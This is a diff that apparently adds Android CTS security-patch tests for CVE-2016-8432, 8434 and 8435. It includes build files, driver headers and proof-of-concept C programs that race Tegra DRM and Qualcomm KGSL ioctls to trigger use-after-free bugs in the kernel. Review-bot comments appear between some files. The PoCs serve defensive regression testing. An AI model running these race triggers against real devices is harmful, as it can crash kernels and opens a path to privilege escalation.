+	gem_create.size = PAGE_SIZE;
+	return 0;
+}
+
+int main()
+{
+	int ret;
+	int i;
+
+	dev_fd = open(DEV,O_RDONLY);
+	if(dev_fd == -1){
+		return 0;
+	}
+
+	prepare();
+
+	ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+	if(ret == -1){
+		goto out_dev;
+	}
+
+	submit_c.context = open_c.context;
+
+	ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_GEM_CREATE, &gem_create);
+	if(ret == 0){
+		for(i = 0; i < CMD_NUM; i++){
+			cmdbufs[i].words = 0;
+			cmdbufs[i].offset = 0;
+			cmdbufs[i].handle = gem_create.handle;
+			relocs[i].cmdbuf.handle = gem_create.handle;
+			relocs[i].cmdbuf.offset = 8192;
+			relocs[i].target.handle = gem_create.handle;
+			relocs[i].target.offset = 8192;
+		}
+		ioctl(dev_fd, DRM_IOCTL_TEGRA_SUBMIT, &submit_c);
+	}else{
+	}
+
+out_dev:
+	close(dev_fd);
+	return 0;
+}
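Review bot: Every exit path in `main` returns 0 without printing anything, so a run on a device without the node looks the same as a run that exercised the driver. That covers a failed `open` of `DEV`, a failed `DRM_IOCTL_TEGRA_OPEN_CHANNEL`, and the empty `else{}` after `DRM_IOCTL_TEGRA_GEM_CREATE`. The file defines `LOG` and `ERR` but never calls them; `ERR("open " DEV);` before the early return, and the same on the two ioctl failures, would make the outcome readable, and needs `#include <string.h>` for `strerror`. `PAGE_SIZE` is used in `prepare` with no include that visibly provides it, so it presumably arrives transitively; an explicit include or `sysconf(_SC_PAGESIZE)` would remove the guess. Passing `&open_c`, `&submit_c` and `&gem_create` to `ioctl` silently drops their `volatile` qualifier.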
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8432/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8432/Android.mk
new file mode 100644
index 0000000..614d20b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8432/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8432
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8432/local_poc.h b/hostsidetests/security/securityPatch/CVE-2016-8432/local_poc.h
new file mode 100644
index 0000000..c74db80
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8432/local_poc.h
@@ -0,0 +1,245 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __LOCAL_POC_H__
+#define __LOCAL_POC_H__
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME     0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM         (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD            13
+#define PRIV_CMD_OID                    15
+#define PRIV_CMD_SW_CTRL                20
+#define PRIV_CMD_WSC_PROBE_REQ          22
+
+enum host1x_class {
+        HOST1X_CLASS_HOST1X = 0x1,
+        HOST1X_CLASS_NVENC = 0x21,
+        HOST1X_CLASS_VI = 0x30,
+        HOST1X_CLASS_ISPA = 0x32,
+        HOST1X_CLASS_ISPB = 0x34,
+        HOST1X_CLASS_GR2D = 0x51,
+        HOST1X_CLASS_GR2D_SB = 0x52,
+        HOST1X_CLASS_VIC = 0x5D,
+        HOST1X_CLASS_GR3D = 0x60,
+        HOST1X_CLASS_NVJPG = 0xC0,
+        HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_TEGRA_GEM_CREATE		0x00
+#define DRM_COMMAND_BASE                0x40
+#define DRM_COMMAND_END                 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL          0x05
+#define DRM_TEGRA_CLOSE_CHANNEL         0x06
+#define DRM_TEGRA_SUBMIT		0x08
+
+struct drm_tegra_open_channel {
+        __u32 client;
+        __u32 pad;
+        __u64 context;
+};
+
+struct drm_tegra_close_channel {
+        __u64 context;
+};
+
+struct drm_tegra_cmdbuf {
+	__u32 handle;
+	__u32 offset;
+	__u32 words;
+	__u32 pad;
+};
+
+struct host1x_waitchk {
+	struct host1x_bo *bo;
+	__u32 offset;
+	__u32 syncpt_id;
+	__u32 thresh;
+};
+
+struct drm_tegra_waitchk {
+	__u32 handle;
+	__u32 offset;
+	__u32 syncpt;
+	__u32 thresh;
+};
+
+struct drm_tegra_submit {
+	__u64 context;
+	__u32 num_syncpts;
+	__u32 num_cmdbufs;
+	__u32 num_relocs;
+	__u32 num_waitchks;
+	__u32 waitchk_mask;
+	__u32 timeout;
+	__u64 syncpts;
+	__u64 cmdbufs;
+	__u64 relocs;
+	__u64 waitchks;
+	__u32 fence;		/* Return value */
+	__u32 reserved0;
+	__u64 fences;
+	__u32 reserved1[2];	/* future expansion */
+};
+
+struct drm_tegra_gem_create {
+	__u64 size;
+	__u32 flags;
+	__u32 handle;
+};
+
+struct drm_gem_close {
+	__u32 handle;
+	__u32 pad;
+};
+
+struct drm_mode_map_dumb {
+	__u32 handle;
+	__u32 pad;
+	__u64 offset;
+};
+
+#define DRM_IOCTL_BASE                  'd'
+#define DRM_IOWR(nr,type)       _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOW(nr,type)		_IOW(DRM_IOCTL_BASE,nr,type)
+
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_SUBMIT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SUBMIT, struct drm_tegra_submit)
+#define DRM_IOCTL_TEGRA_GEM_CREATE DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_GEM_CREATE, struct drm_tegra_gem_create)
+#define DRM_IOCTL_GEM_CLOSE		DRM_IOW (0x09, struct drm_gem_close)
+#define DRM_IOCTL_MODE_MAP_DUMB    DRM_IOWR(0xB3, struct drm_mode_map_dumb)
+
+struct drm_tegra_syncpt {
+	__u32 id;
+	__u32 incrs;
+};
+
+struct list_head {
+	struct list_head *next, *prev;
+};
+
+struct kobject {
+	const char			*name;
+	struct list_head	entry;
+	struct kobject		*parent;
+	void	*kset;
+	void	*ktype;
+	void	*sd;
+	unsigned long refcount;
+	unsigned int state_initialized:1;
+	unsigned int state_in_sysfs:1;
+	unsigned int state_add_uevent_sent:1;
+	unsigned int state_remove_uevent_sent:1;
+	unsigned int uevent_suppress:1;
+};
+
+struct device {
+	struct device	*parent;
+	void	*p;
+	void*	pad0[8];
+	char	*init_name; 
+	void	*type;
+	void*	pad1[5];
+	void	*bus;
+	void	*driver;
+	void	*platform_data;
+	void	*driver_data;
+};
+
+struct host1x_info {
+	int	nb_channels;		
+	int	nb_pts;
+	int	nb_bases;
+	int	nb_mlocks;
+	int	(*init)(void *);
+	int	sync_offset;
+};
+
+struct host1x_syncpt_ops {
+	void (*restore)(void *syncpt);
+	void (*restore_wait_base)(void *syncpt);
+	void (*load_wait_base)(void *syncpt);
+	__u32 (*load)(void *syncpt);
+	int (*cpu_incr)(void *syncpt);
+	int (*patch_wait)(void *syncpt, void *patch_addr);
+};
+
+struct host1x {
+	struct host1x_info *info;
+	void	*regs;
+	void	*syncpt;
+	void	*bases;
+	struct device *dev;
+	void	*clk;
+	void	*clk_actmon;
+	void*	pad[5];
+	void	*intr_wq;
+	int intr_syncpt_irq;
+	int intr_general_irq;
+	__u32 intstatus;
+	void (*host_isr[32])(__u32, void *);
+	void *host_isr_priv[32];
+	struct host1x_syncpt_ops *syncpt_op;
+	void	*intr_op;
+	void	*channel_op;
+	void	*cdma_op;
+	void	*cdma_pb_op;
+	void	*actmon_op;
+	void	*debug_op;
+};
+
+struct host1x_client {
+	struct list_head list;
+	void *parent;
+	struct device *dev;
+	void *ops;
+};
+
+struct tegra_drm_client_ops {
+	void* open_channel;
+	void* close_channel; 
+	void* reset;
+	void* is_add_reg;
+	void* submit;
+};
+
+struct tegra_drm_client {
+	unsigned char pad[232];
+	struct list_head list;
+	struct tegra_drm_client_ops *ops;
+};
+
+struct tegra_drm_context {
+	struct tegra_drm_client *client;
+	void *channel;
+	struct list_head list;
+};
+
+struct drm_tegra_reloc {
+	struct {
+		__u32 handle;
+		__u32 offset;
+	} cmdbuf;
+	struct {
+		__u32 handle;
+		__u32 offset;
+	} target;
+	__u32 shift;
+	__u32 pad;
+};
+
+#endif
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8432/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8432/poc.c
new file mode 100644
index 0000000..52b48f2
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8432/poc.c
@@ -0,0 +1,146 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <unistd.h>
+#include <sys/types.h>
+#include <sys/ioctl.h>
+
+#include "local_poc.h"
+
+#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...) printf(fmt " %d %s\n", ##__VA_ARGS__, errno, strerror(errno))
+
+#define DEV "/dev/dri/renderD129"
+#define CMD_NUM		100
+
+int dev_fd;
+
+volatile struct drm_tegra_open_channel	open_c;
+volatile struct drm_tegra_submit		submit_c;
+volatile struct drm_tegra_gem_create	gem_create;
+volatile struct drm_gem_close			gem_close;
+
+volatile struct drm_tegra_cmdbuf		cmdbufs[CMD_NUM];
+struct drm_tegra_syncpt		syncpt;
+volatile struct drm_tegra_reloc		relocs[CMD_NUM];
+
+static int set_affinity(int num)
+{
+	int ret = 0;
+	cpu_set_t mask;
+	CPU_ZERO(&mask);
+	CPU_SET(num, &mask);
+	ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+	if(ret == -1){
+	}
+	return ret;
+}
+
+static int prepare()
+{
+	int i;
+
+	open_c.client = HOST1X_CLASS_VIC;
+
+	submit_c.num_syncpts = 1;
+	submit_c.syncpts = (__u64)&syncpt;	
+
+	gem_close.handle = 1;
+
+	for(i = 0; i < CMD_NUM; i++){
+		cmdbufs[i].words = 0;
+		cmdbufs[i].offset = 0;
+		cmdbufs[i].handle = 0;
+		relocs[i].cmdbuf.handle = 0;
+		relocs[i].cmdbuf.offset = 0;
+		relocs[i].target.handle = 0;
+		relocs[i].target.offset = 0;
+	}
+
+	submit_c.num_cmdbufs = CMD_NUM;
+	submit_c.cmdbufs = (__u64)cmdbufs;
+	
+	submit_c.num_relocs = CMD_NUM;
+	submit_c.relocs = (__u64)relocs;
+
+	gem_create.size = PAGE_SIZE;
+	
+	return 0;
+}
+
+#define SUBMIT_THREAD_NUM 1
+pthread_t submit_thread_id[SUBMIT_THREAD_NUM] = { 0 };
+static void* submit_thread(void *no_use)
+{
+	set_affinity(1);
+	ioctl(dev_fd, DRM_IOCTL_TEGRA_SUBMIT, &submit_c);
+	return NULL;
+}
+
+int main()
+{
+	int ret;
+	int i;
+	__u64 try_time;
+
+	set_affinity(0);
+
+	dev_fd = open(DEV,O_RDONLY);
+	if(dev_fd == -1){
+		return 0;
+	}
+
+	prepare();
+
+	ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_OPEN_CHANNEL, &open_c);
+	if(ret == -1){
+		goto out_dev;
+	}
+
+	submit_c.context = open_c.context;
+
+	try_time = 1;
+	while(1){
+		ret = ioctl(dev_fd, DRM_IOCTL_TEGRA_GEM_CREATE, &gem_create);
+		if(ret == 0){
+			for(i = 0; i < CMD_NUM; i++){
+				cmdbufs[i].handle = gem_create.handle;
+				relocs[i].cmdbuf.handle = gem_create.handle;
+				relocs[i].target.handle = gem_create.handle;
+			}
+			for(i = 0; i < SUBMIT_THREAD_NUM; i++){
+				pthread_create(submit_thread_id + i, NULL, submit_thread, NULL);
+			}
+			usleep(150);
+			while(ioctl(dev_fd, DRM_IOCTL_GEM_CLOSE, &gem_close) == 0);
+		}
+		try_time++;
+	}
+
+	for(i = 0; i < SUBMIT_THREAD_NUM; i++){
+		pthread_join(submit_thread_id[i], NULL);
+	}
+
+out_dev:
+	close(dev_fd);
+	return 0;
+}
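Review bot: The `while(1)` loop in `main` has no exit, so the `pthread_join` loop and the `out_dev:` cleanup below it are dead code, and `try_time` is incremented but never compared with anything. Each pass also calls `pthread_create` into the same `submit_thread_id` slot without joining the previous thread or checking the return value, so threads accumulate until creation starts failing unnoticed. Comparing `try_time` with a named limit in the loop condition and moving the join loop inside the iteration would bound the run and make the cleanup reachable. `set_affinity` has an empty `if(ret == -1){}` branch; either log there or drop it.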
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8434/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8434/Android.mk
new file mode 100644
index 0000000..6b20fe4
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8434/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8434
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8434/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8434/poc.c
new file mode 100644
index 0000000..de88a3b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8434/poc.c
@@ -0,0 +1,171 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdlib.h>
+#include <unistd.h>
+#include <errno.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>  
+#include <unistd.h> 
+#include <sched.h>
+
+#define KGSL_CONTEXT_SAVE_GMEM		0x00000001
+#define KGSL_CONTEXT_NO_GMEM_ALLOC	0x00000002
+/* This is a cmdbatch exclusive flag - use the CMDBATCH equivalent instead */
+#define KGSL_CONTEXT_SUBMIT_IB_LIST	0x00000004
+#define KGSL_CONTEXT_CTX_SWITCH		0x00000008
+#define KGSL_CONTEXT_PREAMBLE		0x00000010
+#define KGSL_CONTEXT_TRASH_STATE	0x00000020
+#define KGSL_CONTEXT_PER_CONTEXT_TS	0x00000040
+#define KGSL_CONTEXT_USER_GENERATED_TS	0x00000080
+/* This is a cmdbatch exclusive flag - use the CMDBATCH equivalent instead */
+#define KGSL_CONTEXT_END_OF_FRAME	0x00000100
+#define KGSL_CONTEXT_NO_FAULT_TOLERANCE 0x00000200
+/* This is a cmdbatch exclusive flag - use the CMDBATCH equivalent instead */
+#define KGSL_CONTEXT_SYNC               0x00000400
+#define KGSL_CONTEXT_PWR_CONSTRAINT     0x00000800
+
+#define KGSL_IOC_TYPE 0x09
+struct kgsl_drawctxt_create {
+	unsigned int flags;
+	unsigned int drawctxt_id; /*output param */
+};
+
+#define IOCTL_KGSL_DRAWCTXT_CREATE \
+	_IOWR(KGSL_IOC_TYPE, 0x13, struct kgsl_drawctxt_create)
+
+/* destroy a draw context */
+struct kgsl_drawctxt_destroy {
+	unsigned int drawctxt_id;
+};
+
+#define IOCTL_KGSL_DRAWCTXT_DESTROY \
+	_IOW(KGSL_IOC_TYPE, 0x14, struct kgsl_drawctxt_destroy)
+
+struct kgsl_timestamp_event {
+	int type;                /* Type of event (see list below) */
+	unsigned int timestamp;  /* Timestamp to trigger event on */
+	unsigned int context_id; /* Context for the timestamp */
+	void __user *priv;	 /* Pointer to the event specific blob */
+	size_t len;              /* Size of the event specific blob */
+};
+#define IOCTL_KGSL_TIMESTAMP_EVENT \
+	_IOWR(KGSL_IOC_TYPE, 0x33, struct kgsl_timestamp_event)
+int g_fd = -1;
+int g_ctx_id = -1;
+int g_sync_fence_fd = -1;
+struct kgsl_timestamp_event g_event;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+
+void trigger_kgsl_create_drawctx() {
+    struct kgsl_drawctxt_create ctx;
+    ctx.flags = KGSL_CONTEXT_PREAMBLE | KGSL_CONTEXT_NO_GMEM_ALLOC;
+    ioctl(g_fd, IOCTL_KGSL_DRAWCTXT_CREATE, &ctx);
+    printf("[*] IOCTL_KGSL_DRAWCTXT_CREATE id(%d), errno = %d\n", ctx.drawctxt_id, errno);
+    g_ctx_id = ctx.drawctxt_id;
+}
+
+void trigger_kgsl_free_drawctx(int id) {
+    struct kgsl_drawctxt_destroy ctx;
+    ctx.drawctxt_id = id;
+    ioctl(g_fd, IOCTL_KGSL_DRAWCTXT_DESTROY, &ctx);
+    //printf("[*] IOCTL_KGSL_DRAWCTXT_DESTROY, errno = %d\n", errno);
+}
+
+void trigger_kgsl_timestamp_event() {
+    
+    
+    //mprotect(event.priv, 0x1000, PROT_READ);
+    
+    ioctl(g_fd, IOCTL_KGSL_TIMESTAMP_EVENT, &g_event);
+    printf("[*] IOCTL_KGSL_TIMESTAMP_EVENT fd(%d), errno = %d\n", *(int*)g_event.priv, errno);
+}
+
+int open_driver() {
+    char* dev_path = "/dev/kgsl-3d0";
+    g_fd = open(dev_path, O_RDWR);
+    if (g_fd < 0) {
+        printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
+    } else {
+        printf("[*] open file(%s) succ!\n", dev_path);
+    }
+    return g_fd;
+}
+
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+    setpriority(PRIO_PROCESS, gettid(), privi);
+    printf("[*] setpriority(%d) errno = %d\n", privi, errno);
+
+    /* bind process to a CPU*/
+    if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+        printf("[*] sched_setaffinity(%ld) errno = %d\n", cpu_mask, errno);
+    }
+}
+
+
+void* race_thread(void* arg) {
+    setup_privi_and_affinity(-19, 2);
+    pthread_mutex_lock(&mutex);
+    pthread_cond_wait(&cond, &mutex);
+    pthread_mutex_unlock(&mutex);
+    while (1) {
+        close(4);
+    }
+    return NULL;
+}
+
+int main(int argc, char**argv) {
+    setup_privi_and_affinity(-19, 1);
+    
+    if (open_driver() < 0) {
+        return -1;
+    }
+    trigger_kgsl_create_drawctx();
+    
+    g_event.type = 2;
+    g_event.context_id = g_ctx_id;
+    g_event.len = 4;
+    g_event.priv = malloc(0x1000);
+    g_event.timestamp = 0;
+    mprotect(g_event.priv, 0x1000, PROT_READ);
+    //printf("[*] close fd errno = %d\n", errno);
+
+    pthread_t tid;
+    pthread_create(&tid, NULL, race_thread, NULL);
+    usleep(100 * 1000);
+    
+    pthread_cond_signal(&cond);
+    usleep(20);
+    while (1) {
+        trigger_kgsl_timestamp_event();
+    }
+
+    return 0;
+}
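Review bot: `trigger_kgsl_create_drawctx` ignores the `ioctl` result, so on failure `ctx.drawctxt_id` is read as uninitialized stack memory and copied into `g_ctx_id`, and the `errno` it prints may be stale. Initialize the struct and check the call: `struct kgsl_drawctxt_create ctx = {0};` and `if (ioctl(g_fd, IOCTL_KGSL_DRAWCTXT_CREATE, &ctx) < 0) { perror("DRAWCTXT_CREATE"); exit(1); }`. The results of `malloc` and `mprotect` in `main` are likewise unchecked. Both `main` and `race_thread` loop on `while (1)` with no exit, so the binary never reports a result itself and the host-side caller has to bound the run; a comment at the top of `main` should say so.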
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8435/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8435/Android.mk
new file mode 100644
index 0000000..62efb65
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8435/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8435
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8435/local_pwn.h b/hostsidetests/security/securityPatch/CVE-2016-8435/local_pwn.h
new file mode 100644
index 0000000..70574fe
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8435/local_pwn.h
@@ -0,0 +1,116 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __local_pwn_H__
+#define __local_pwn_H__
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME     0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM         (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD            13
+#define PRIV_CMD_OID                    15
+#define PRIV_CMD_SW_CTRL                20
+#define PRIV_CMD_WSC_PROBE_REQ          22
+
+enum host1x_class {
+        HOST1X_CLASS_HOST1X = 0x1,
+        HOST1X_CLASS_NVENC = 0x21,
+        HOST1X_CLASS_VI = 0x30,
+        HOST1X_CLASS_ISPA = 0x32,
+        HOST1X_CLASS_ISPB = 0x34,
+        HOST1X_CLASS_GR2D = 0x51,
+        HOST1X_CLASS_GR2D_SB = 0x52,
+        HOST1X_CLASS_VIC = 0x5D,
+        HOST1X_CLASS_GR3D = 0x60,
+        HOST1X_CLASS_NVJPG = 0xC0,
+        HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_COMMAND_BASE                0x40
+#define DRM_COMMAND_END                 0xA0
+
+#define DRM_TEGRA_OPEN_CHANNEL          0x05
+#define DRM_TEGRA_CLOSE_CHANNEL         0x06
+#define DRM_TEGRA_SUBMIT		0x08
+
+struct drm_tegra_open_channel {
+        __u32 client;
+        __u32 pad;
+        __u64 context;
+};
+
+struct drm_tegra_close_channel {
+        __u64 context;
+};
+
+struct drm_tegra_submit {
+	__u64 context;
+	__u32 num_syncpts;
+	__u32 num_cmdbufs;
+	__u32 num_relocs;
+	__u32 num_waitchks;
+	__u32 waitchk_mask;
+	__u32 timeout;
+	__u64 syncpts;
+	__u64 cmdbufs;
+	__u64 relocs;
+	__u64 waitchks;
+	__u32 fence;		/* Return value */
+	__u32 reserved0;
+	__u64 fences;
+	__u32 reserved1[2];	/* future expansion */
+};
+
+#define DRM_IOCTL_BASE                  'd'
+#define DRM_IOWR(nr,type)               _IOWR(DRM_IOCTL_BASE,nr,type)
+#define DRM_IOCTL_TEGRA_OPEN_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_OPEN_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_CLOSE_CHANNEL DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_CLOSE_CHANNEL, struct drm_tegra_open_channel)
+#define DRM_IOCTL_TEGRA_SUBMIT DRM_IOWR(DRM_COMMAND_BASE + DRM_TEGRA_SUBMIT, struct drm_tegra_submit)
+
+struct drm_tegra_syncpt {
+	__u32 id;
+	__u32 incrs;
+};
+
+struct list_head {
+	struct list_head *next, *prev;
+};
+
+struct tegra_drm_client_ops {
+	void* open_channel;
+	void* close_channel; 
+	void* reset;
+	void* is_add_reg;
+	void* submit;
+};
+
+struct tegra_drm_client {
+	/* sizeof(host1x_client) is 232 */
+	unsigned char pad[232];	/* maybe gadget arguments */
+	struct list_head list;
+	struct tegra_drm_client_ops *ops;
+};
+
+struct tegra_drm_context {
+	struct tegra_drm_client *client;
+	void *channel;
+	struct list_head list;
+	/* FIXME we need pass lock op */
+	//struct mutex lock;
+	//bool keepon;
+	//struct host1x_user user;
+};
+
+#endif
